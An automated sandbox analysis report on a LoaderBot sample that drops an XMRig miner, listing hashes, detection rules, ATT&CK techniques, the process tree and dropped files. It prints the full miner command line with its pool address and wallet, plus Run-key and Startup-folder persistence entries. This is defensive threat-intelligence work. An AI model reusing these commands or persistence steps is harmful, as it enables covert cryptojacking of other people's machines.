loaderbot | 0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
20-02-2024 05:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe
Size

21.4MB
MD5

7494cccce30350832ac77113f3cf28d8
SHA1

ffba86775e5dc0a12957249e5f2d1c48bb1c58f0
SHA256

0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6
SHA512

94550c34c2887ca3227bfc559eeb2806bdd189b31bd866facbc5ed22ff2f6dc89684b268aa22a36c1b6a062deb2db6545d4e1b021a572f85fc9fcf7f65d059e7
SSDEEP

393216:KYd9oOoUptPemm5HCizqg+o1sg1t6u14FBmqXiW2wcpIZSFH+fbYdUvCAhZ:pdnh/Ge41L1th15qIT41fsdU6m

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables built or packed with MPress PE compressor 26 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe	INDICATOR_EXE_Packed_MPress
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe	INDICATOR_EXE_Packed_MPress
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe	INDICATOR_EXE_Packed_MPress
behavioral2/memory/1104-26-0x0000000000240000-0x000000000063E000-memory.dmp	INDICATOR_EXE_Packed_MPress
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe	INDICATOR_EXE_Packed_MPress
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe	INDICATOR_EXE_Packed_MPress
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe	INDICATOR_EXE_Packed_MPress
behavioral2/memory/4348-1183-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/4348-1186-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1190-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1191-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1198-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1199-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1201-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1205-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1206-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1207-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1208-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1209-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1210-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1211-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1212-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1213-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3544-1214-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe	INDICATOR_EXE_Packed_MPress

LoaderBot executable 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe	loaderbot
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe	loaderbot
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe	loaderbot
behavioral2/memory/1104-26-0x0000000000240000-0x000000000063E000-memory.dmp	loaderbot

XMRig Miner payload 16 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4348-1186-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1190-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1191-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1198-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1199-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1201-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1205-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1206-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1207-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1208-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1209-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1210-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1211-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1212-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1213-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3544-1214-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exeExLoader_Installer.exeMinerMega.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	ExLoader_Installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	MinerMega.exe

Drops startup file 1 IoCs

Processes:

MinerMega.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url MinerMega.exe
Executes dropped EXE 6 IoCs

Processes:

ExLoader_Installer.exeMinerMega.exeExLoader_Installer.exeDriver.exeDriver.exeDriver.exe

pid process

4368 ExLoader_Installer.exe
1104 MinerMega.exe
2564 ExLoader_Installer.exe
4348 Driver.exe
3544 Driver.exe
2904 Driver.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	MinerMega.exe

pid	process
4368	ExLoader_Installer.exe
1104	MinerMega.exe
2564	ExLoader_Installer.exe
4348	Driver.exe
3544	Driver.exe
2904	Driver.exe

Loads dropped DLL 7 IoCs

Processes:

0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exeExLoader_Installer.exe

pid	process
3112	0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe
2564	ExLoader_Installer.exe
2564	ExLoader_Installer.exe
2564	ExLoader_Installer.exe
2564	ExLoader_Installer.exe
2564	ExLoader_Installer.exe
2564	ExLoader_Installer.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

MinerMega.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\MinerMega.exe"	MinerMega.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

MinerMega.exe

pid	process
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe
1104	MinerMega.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

MinerMega.exeDriver.exeDriver.exeDriver.exe

description	pid	process
Token: SeDebugPrivilege	1104	MinerMega.exe
Token: SeLockMemoryPrivilege	4348	Driver.exe
Token: SeLockMemoryPrivilege	4348	Driver.exe
Token: SeLockMemoryPrivilege	3544	Driver.exe
Token: SeLockMemoryPrivilege	3544	Driver.exe
Token: SeLockMemoryPrivilege	2904	Driver.exe
Token: SeLockMemoryPrivilege	2904	Driver.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

ExLoader_Installer.exe

pid process

2564 ExLoader_Installer.exe
2564 ExLoader_Installer.exe

pid	process
2564	ExLoader_Installer.exe
2564	ExLoader_Installer.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exeExLoader_Installer.exeExLoader_Installer.execmd.execmd.exeMinerMega.exe

description	pid	process	target process
PID 3112 wrote to memory of 4368	3112	0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe	ExLoader_Installer.exe
PID 3112 wrote to memory of 4368	3112	0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe	ExLoader_Installer.exe
PID 3112 wrote to memory of 1104	3112	0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe	MinerMega.exe
PID 3112 wrote to memory of 1104	3112	0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe	MinerMega.exe
PID 3112 wrote to memory of 1104	3112	0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe	MinerMega.exe
PID 4368 wrote to memory of 2564	4368	ExLoader_Installer.exe	ExLoader_Installer.exe
PID 4368 wrote to memory of 2564	4368	ExLoader_Installer.exe	ExLoader_Installer.exe
PID 2564 wrote to memory of 1660	2564	ExLoader_Installer.exe	cmd.exe
PID 2564 wrote to memory of 1660	2564	ExLoader_Installer.exe	cmd.exe
PID 1660 wrote to memory of 1172	1660	cmd.exe	reg.exe
PID 1660 wrote to memory of 1172	1660	cmd.exe	reg.exe
PID 2564 wrote to memory of 2452	2564	ExLoader_Installer.exe	cmd.exe
PID 2564 wrote to memory of 2452	2564	ExLoader_Installer.exe	cmd.exe
PID 2452 wrote to memory of 3532	2452	cmd.exe	reg.exe
PID 2452 wrote to memory of 3532	2452	cmd.exe	reg.exe
PID 1104 wrote to memory of 4348	1104	MinerMega.exe	Driver.exe
PID 1104 wrote to memory of 4348	1104	MinerMega.exe	Driver.exe
PID 1104 wrote to memory of 3544	1104	MinerMega.exe	Driver.exe
PID 1104 wrote to memory of 3544	1104	MinerMega.exe	Driver.exe
PID 1104 wrote to memory of 2904	1104	MinerMega.exe	Driver.exe
PID 1104 wrote to memory of 2904	1104	MinerMega.exe	Driver.exe

C:\Users\Admin\AppData\Local\Temp\0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe
"C:\Users\Admin\AppData\Local\Temp\0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3112

C:\Users\Admin\AppData\Roaming\1337\ExLoader_Installer.exe
"C:\Users\Admin\AppData\Roaming\1337\ExLoader_Installer.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4368

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography /v MachineGuid
4⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography /v MachineGuid
5⤵
PID:1172

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
4⤵
- Suspicious use of WriteProcessMemory
PID:2452

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
5⤵
PID:3532

C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe
"C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1104

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3544

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2904

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe
Filesize
160KB

MD5
2ead84d84868efb13f8ef2cc9899905a

SHA1
5b044f580c052eef4c2ab9e3f772446b2280ecde

SHA256
03377f1e71e58a58646b9443fa86c8d5e27d5457b08976b07c44a192b210f93b

SHA512
2065f2a79afac4fca286550a59cf98fd723e590591fc2272e26d9d1aa83cb21b5bf85cf2e55860d4dd7b313daac094049ab52f04e1fd6be309f17cb4bb7b2e5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\MSVCP140.dll
Filesize
554KB

MD5
9aeacfd60c19fdb1af926ecf7e6eab87

SHA1
e18684b140af095c25628fcc599b600b2ef999a9

SHA256
7bb664a486e941d0f6004ef1eb48773c7c5f1be5f1cbf1aa5f9819a215863d5d

SHA512
8a9654018313ab79af95a92745b4faaa87b62210506bfd788919769878a43efaf6e48494b8b2c7ad6155adebb8b07cae0f06ef734e9042c858478e95e911c656

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d3dcompiler_47.dll
Filesize
1.1MB

MD5
b30e4fdef57b03ead3a2596b3e4921e2

SHA1
d3ff423c16f67185c655bb8c416112f5dcb56fce

SHA256
f3a4c54fe64b83e4d23ceb0b06e11c982d7b0cd9cb1d6f5a4da071a04e4771d6

SHA512
20b8c363de63ac8ff4252b6fdaf6d33268226f41d6d0fd0cd3a03c5180c5beee451e8515b88a721c7b06cc216496797be2b4a9e7eebd70a59e2519b12f9a78e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d3dcompiler_47.dll
Filesize
1.2MB

MD5
bb9cdb901e86c6b3e4ada24aaadee61b

SHA1
9c8947853c8ca627f3eec28490e0f5466796991c

SHA256
e2469f2557308e3ad75022abbd8eec7c45514b9b95843fa8d2c239b83fe52d60

SHA512
9bce57154c8048edf29b9794499e940faef5c9d7d7fe45cd62fa6c59df68166e923f212799d6a336c1d89adfc83b14703e714ef3fbff3de01f3eaace04a9f693

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\app.so
Filesize
3.6MB

MD5
c51ed309cd8037beddf3fc5dc1c124b7

SHA1
21863b29c78aca3624ee7d30e4cb9182e6a71499

SHA256
1ae4c4db2e1fbe2d884ae24e2779ea816b429c740e2c25ba14ccdc73c8a08f81

SHA512
2c257bab10d6cc3619b4c18f50c616bdcff8304ffc674994576320fa7ad1a2295ddfb421e975593de4e7506740847c8b9fb480e9e38e117bb6c6964aec1b9406

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\AssetManifest.bin
Filesize
36KB

MD5
37319e9e5131c88c5169e044dfd432fb

SHA1
f8207003744b2cf6d6ebd6080c9afe5925904a0d

SHA256
f50d907a3487cfbff2fe04f6eca8f38c968d52c971c8044a9e9d39286becf735

SHA512
3e8750f329f936622e55162003b73a57a808db1a3c408fcabb0a3653c5126b0848e1df1b84bac54406b5c365b8a89cf4c29d41774c97b8c393457e308f994b65

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\FontManifest.json
Filesize
687B

MD5
08916680285af6ddf4adbd1dd265487d

SHA1
e5fa77912a69248aab08714c5b605df62c469f33

SHA256
ef252f80a090c0ae1499c34148c27f3e982100b25c8daa9921d102343383f751

SHA512
68c9858777147a6a1c4932c13149aba4bb97453a3aface4c80077a5746ed493c811e36cd89b838e34429e91b1833b1866177b4bfc216129d555f310fe71a108f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\backgrounds\Warcraft.jpg
Filesize
52KB

MD5
a48a77f8b3f8f7e6a9661776472b14c0

SHA1
7118461b780b558939a325a319e8515edbbedef1

SHA256
2e58bd1444d8452ba963e877601e8942a1560abdd44c16ed33580148322234ba

SHA512
f6a8a2844d872b650fc6342f809198bf078cf2d472c1b43f18529a0216393f6494202ab3b95ffef560fdba4bee7a4c6a85be49d9151cbd52c0c870d65c6e47fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\flags\RE.png
Filesize
2KB

MD5
23f2c7dc04bfe492598bc440f57114af

SHA1
c30b386b7138a1d89b90f0e679ef58f4c545ba42

SHA256
94a0c4bc3aa825e44d36b0a463f9bfb012c2156392594a8ac6d76b389776e3a9

SHA512
edbc28f9f61ad48ac02e1bcb0f862249b5baf352289e068cb5df5552b5e9752a205e7b093b7caedccf4230186659d4b12579433ae8141b5129a5a6cf4c6bc5f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\flags\SJ.png
Filesize
2KB

MD5
bf25a4249d34f915ec1a246a468290cc

SHA1
5cc47373c11ff0488929124e18e280c7eb36b232

SHA256
0dd0e0a0d72ff4179b11afd5367a72b000de4a5c5ea0362f1f1723f80a3a2d22

SHA512
982fbc34c0c0ccad148b6745185af317bbe12215e08c879c6a06a7073d2afbcbc70c4fed9e028cc91a6a1eaa1fece064dbddf415a4b97a799dbfb1debcc02337

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-Black.ttf
Filesize
159KB

MD5
35e0e2e7a5b03275ba569a214edbab77

SHA1
b341b185db9c7231884558dcdab0124d2f5ed1d0

SHA256
2d1149ca6075e3559fa4234107474b3b500bc479baa0bdaa8a99563a587c62f5

SHA512
e3d752d8fd5a7306dcf8fc428b72df1668991b7152b66fba41e365cc61626f8ddfc8092dbcbc2b2ef3acea5c09496e83af2a2208cdd5b66e7ff3267b2bf2f0d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-Bold.ttf
Filesize
159KB

MD5
88079335418f389bfb2d86bc4f1ced64

SHA1
fd799b6fb4aff1a9402e071ab02d1ddea731b868

SHA256
85c6a818e33ae8b62d15672522c0b12f2e602680f75c4414ee815a73596ad365

SHA512
5105d0f432cda4de9749e4e0dd09f9687d06ad17b7e02f98dc9d0b2ffc3d959c386302f8882c3a3f1021c39ecf88e60f5e630b929fb905eec48bead923b47e11

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-ExtraBold.ttf
Filesize
159KB

MD5
27f7ef17de3691b5cdb9f1ee1ee5cc6a

SHA1
1c92715c134738f2956bf758181522243c7586dd

SHA256
118e237edf796dd76c453e912a4f445816e918bc3ff1d3941b2548c0a8fdfe29

SHA512
6d5c68056a37d989f64528c092680416c1300c95471be43ebddff7b579bcae9dfa7f402ab422406bf3a4a3df728b4af1e68e15e385b49221847f48e0bc59f228

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-Medium.ttf
Filesize
159KB

MD5
b952c3c81ba34b54c66c748ea1e828a7

SHA1
9d35f805e98f95e72f5d0a4ced7397584d7349be

SHA256
f5a6dcd3227d1a75db47a6770e617d8077cba42c146d1d6479ae394431c7d40e

SHA512
30ddc9f9fd2916b3ac846cac60c93b5f89057a1369ffd38ccf569a6eba3dff6be10408ad7413257e794e94a46e68e67105fae28f1ce95544485edbe85842a420

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\Raleway-SemiBold.ttf
Filesize
159KB

MD5
87641f9900d717d6bfbf108b8755868e

SHA1
75f4fca0d4d80e2b9a62d3283261e933786fb8c1

SHA256
564368e49d2d7d65005649278c3e042d6954df5e5dee3874a3b548ad067db0cc

SHA512
a319660d6457efd705c291aa5445146f77e2d099ac26be3f48963b9846cb0f3cfaaee1fbd1e9acb5a7ebb74d39b541d00c76fd50932b388cee7ff54da2ef40ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\icons\close.svg
Filesize
201B

MD5
7f8d672a2849987b498734dcb90f0c51

SHA1
e53b9319bf964c15099080ac5497ee39f8bab362

SHA256
4a290648cd1cfaaf1db4909d7552ae8cb83cb0b0e36770e64d153ab07ce6e7d4

SHA512
b3ddbf719f42440238c55cee896409179b4562ffe74f607d3640f623c8264c2fd2000b085dfd9a25ffd8ba2166695dcd663efec56cdac679f9993cfb602459d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\icons\collapse.svg
Filesize
195B

MD5
ad6092934dc48be9d00331e6f21eb235

SHA1
29cd8e5478e432b386382caf6ac7b3537b108c33

SHA256
2e0eb48ef144b771903a2ee5096ac4305ef43c830d2905f46b0384a07f5f4090

SHA512
38254a977c1a74515ed6184b5ebb3b1b3125db4b713a2de69aee9dc54912a9e869fede36423548e9ebf8cfc66e6711738789ee2c33f6f3af74def779eb7e5afd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\images\grain.png
Filesize
79KB

MD5
3577f702479e7f31a32a96f38a36e752

SHA1
e407b9ac4cfe3270cdd640a5018bec2178d49bb1

SHA256
cc453dfe977598a839a52037ef947388e008e5cdfe91b1f1a4e85afb5509bee2

SHA512
1a4a03931ab56c8352382414f55eb25b324e11890d51ba95597dbd867b35db45db5adcefb47d95b3763f413a66e3228e59531bdbd5ba5541469196adb5eb3d70

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\icudtl.dat
Filesize
798KB

MD5
cf772cf9f6ca67f592fe47da2a15adb1

SHA1
9cc4d99249bdba8a030daf00d98252c8aef7a0ff

SHA256
ac44ccc3f61bf630bb20fb8043d86cfe4c8995d06b460084400db45d70497b30

SHA512
0bec0d3a34a4ac1cc2ed81dba3bc52981c5dd391a68fe21132dfadb70e42ffbe8f3ba798185733d64a900fd2bb2403f9a8558e6666f2c1e2c0e818d8e3f154fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\flutter_windows.dll
Filesize
5.0MB

MD5
4fb8292cad2d483a83a89d6532c33002

SHA1
a4789e7ac36e56349d6a3239c218e8aff7533e0a

SHA256
53382f1e04ba1d027460344cfe1e809289a50dd411944467bf9a906ce4659087

SHA512
0e264ccaa7651598e867ad6059bbd95a8d8873d5b8b02a105c1dc4a34fd4a2383ac4caa18034fa96890f43f2717f3beda6a2ceba4eb41df09082e8de1acdfd6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\flutter_windows.dll
Filesize
4.8MB

MD5
cea05670226bc7dca69663d6fb011d75

SHA1
234d1b76325d2e46358779e28ef856e5b0e8e057

SHA256
f4faef1e5c45e6f91e00112714aa170954b937a5e3f0fe00824c65132a4466fe

SHA512
d535e7f44919c5824cd467efd414faf54291634b0fcc74f8f4f40df43927456d2f101b801da3e6fdaf598c0f37cc1a5909f1d74226e522e7e5c028091a48c256

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\vcruntime140.dll
Filesize
94KB

MD5
c8e5574247f5a2468f71b53fc0279594

SHA1
c28d7c9cad48882beaeed0fba15cbc11fc2f949c

SHA256
0373c0cd6856950dee1b1a9e3ddb896099c6c823f6e46dc00802fed19dbd58d0

SHA512
d244d3879cbdfd22bd94eb7d4950916b5999d6c012b0287a8807a110f1bc80266049f4d0563b97bb0154bcde7480ffcba07e9f7e66fc2ac20020e3c77792df81

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\vcruntime140_1.dll
Filesize
36KB

MD5
35628f1d136c003699382ea7d489cb16

SHA1
30dfd392927161182224f0e6b8aace235a00fbea

SHA256
0d6f93c5d19530a1623798f936468bc0934c1795545dd000b8812539b3e308cf

SHA512
558e6d729d39f25584191804e3b60f8fe8e9e950d58cd8f82eeaecb45c5bc86f2b9e9ac499ddabbee7dfe6a6ac6cb44cf63ced6e8105405ab9b314b5005d9cf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsn4DF3.tmp\System.dll
Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Users\Admin\AppData\Roaming\1337\ExLoader_Installer.exe
Filesize
2.1MB

MD5
8d3b07fb3adc6de24c38cb18c8444d6a

SHA1
000ba01f3f93da6c2ad8453e030eed14c0cb104c

SHA256
ebcc8820f0170182bd0869e08b178b0863c608612b32cfec8a7b0c0641b2c027

SHA512
51518f062a52cf562681d8d5a784ab855940cd4e05907d7795f72bf27a584de81c4a9012c43c4b3a47e17571c1f3a2dcaa2469a2537302fc3923858720074c1c

Download Submit
